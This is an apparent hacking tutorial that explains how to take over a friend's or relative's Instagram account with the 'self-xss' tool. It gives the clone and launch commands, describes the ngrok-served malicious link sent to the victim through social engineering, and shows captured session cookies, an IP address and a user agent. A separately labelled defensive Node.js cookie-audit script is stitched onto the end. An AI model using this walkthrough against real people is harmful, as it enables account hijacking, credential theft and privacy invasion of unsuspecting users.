
HACK INSTAGRAM OF YOUR FRIEND AND HIJACK HIS/HER INSTAGRAM COOKIES


INTRODUCTION
Did you know how easy it is to hack the Instagram account of your friend by hijacking his or her Instagram cookies?
This is one of the tricks used by hackers to steal your Instagram account. Whenever we log in to any
website, say Instagram, the Instagram server stores a small piece of data (also called a web cookie) in our
browser. As commented by the researcher of the International Institute of Cyber Security, “If we are able to
steal or hijack these web cookies (we got after authenticating/logging on Instagram), we can log in to the
Instagram account of that person”.

Today we will show how easy it is to get the cookies of an authenticated/logged-in user of a particular website,
who can be your friend or relative, using the Self-XSS hacking tool. Self-XSS relies on social engineering, and
with it a hacker can gain control of the victim's Instagram account.

ENVIRONMENT
• OS: Kali Linux 2019.3 64 bit
• Kernel version: 5.2.0

INSTALLATION STEPS
• Use this command to clone the project.
• git clone https://github.com/thelinuxchoice/self-xss

root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/self-xss
Cloning into 'self-xss'...
remote: Enumerating objects: 38, done.
remote: Counting objects: 100% (38/38), done.
remote: Compressing objects: 100% (37/37), done.
remote: Total 38 (delta 12), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (38/38), 12.79 KiB | 422.00 KiB/s, done.

• Use the cd command to enter the self-xss directory.

root@kali:/home/iicybersecurity# cd self-xss/

root@kali:/home/iicybersecurity/self-xss#
• Now, use this command to launch the tool: bash self-xss.sh

Self-XSS – Malicious code

• After launching the tool, first we have to enter the website name whose account we want to hack. In our
case, it will be https://instagram.com
• Next, enter the email and password details.
• Then the tool will download Ngrok automatically and start the PHP server and the Ngrok server.
• Then it will give the malicious URL, as we can see in the above picture.
• Now, send this malicious code to the victim using social engineering tricks and ask the victim to open this
link in the same browser tab as Instagram.
Self-XSS – Malicious code Injected
• The malicious code captures the Instagram cookies and IP address details of the victim and sends them back
to the hacker.
• Now go to the hacker machine where Self-XSS is running.
• Go to the tool directory: cd /home/iicybersecurity/self-xss
• To verify, use the cat command to view the details of the cookies.
o cat cookies.backup

root@kali:/home/iicybersecurity/self-xss# cat cookies.backup

mid=XsYGMQALAAFTsuFdOqBKpj1oAJs6; csrftoken=2Z8ovGnPCnaRccQ7Og2GlPLWBIAj4zFD; ds_user_id=29687340949

• We got the Instagram cookies.


• Now use the cat command to view the IP and browser details.
o cat saved.ip.txt
root@kali:/home/iicybersecurity/self-xss# cat saved.ip.txt

IP: 112.196.159.115
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36

Here, we successfully got the victim's IP address with machine details and the victim's Instagram cookies.

CONCLUSION
We have now seen how the cookie details of a victim can be obtained using Self-XSS in combination with social
engineering. So it is always recommended never to click on any suspicious link, especially while you are
logged in to a social networking website or any other website.
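
On the defensive side, JavaScript running in a page can read through document.cookie only the cookies that were set without the HttpOnly attribute. The following Node.js check is an added example, not part of the original article or of the self-xss tool: it parses Set-Cookie headers and lists the cookies exposed to page script. The sample headers are constructed; their attributes and the sessionid cookie are assumptions.

```javascript
// Audit Set-Cookie headers: which cookies can page script read via document.cookie?
// Sample headers are constructed for this example; the attributes and the
// "sessionid" cookie are assumptions, not captured from any real site.
const SAMPLE_HEADERS = [
  "mid=EXAMPLE_MID; Path=/; Secure",
  "csrftoken=EXAMPLE_CSRF; Path=/; Secure; SameSite=Lax",
  "ds_user_id=0000000000; Path=/; Secure",
  "sessionid=EXAMPLE_SESSION; Path=/; Secure; HttpOnly; SameSite=Lax",
];

// Parse one Set-Cookie header value into its name and security attributes.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((part) => part.trim());
  const eq = pair.indexOf("=");
  if (eq < 1) return null; // malformed: no cookie name
  const flags = new Map();
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    flags.set(key, i === -1 ? "" : attr.slice(i + 1).trim());
  }
  return {
    name: pair.slice(0, eq),
    httpOnly: flags.has("httponly"),
    secure: flags.has("secure"),
    sameSite: flags.has("samesite") ? flags.get("samesite").toLowerCase() : null,
  };
}

// Cookies without HttpOnly are exposed to any script running in the page.
function auditCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => c !== null)
    .map((c) => ({ ...c, scriptReadable: !c.httpOnly }));
}

// Names of the cookies a script in the page could read.
function scriptReadableNames(headers) {
  return auditCookies(headers).filter((c) => c.scriptReadable).map((c) => c.name);
}

console.log(scriptReadableNames(SAMPLE_HEADERS));
```

Any session-bearing cookie that appears in this list is a candidate for the HttpOnly attribute.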
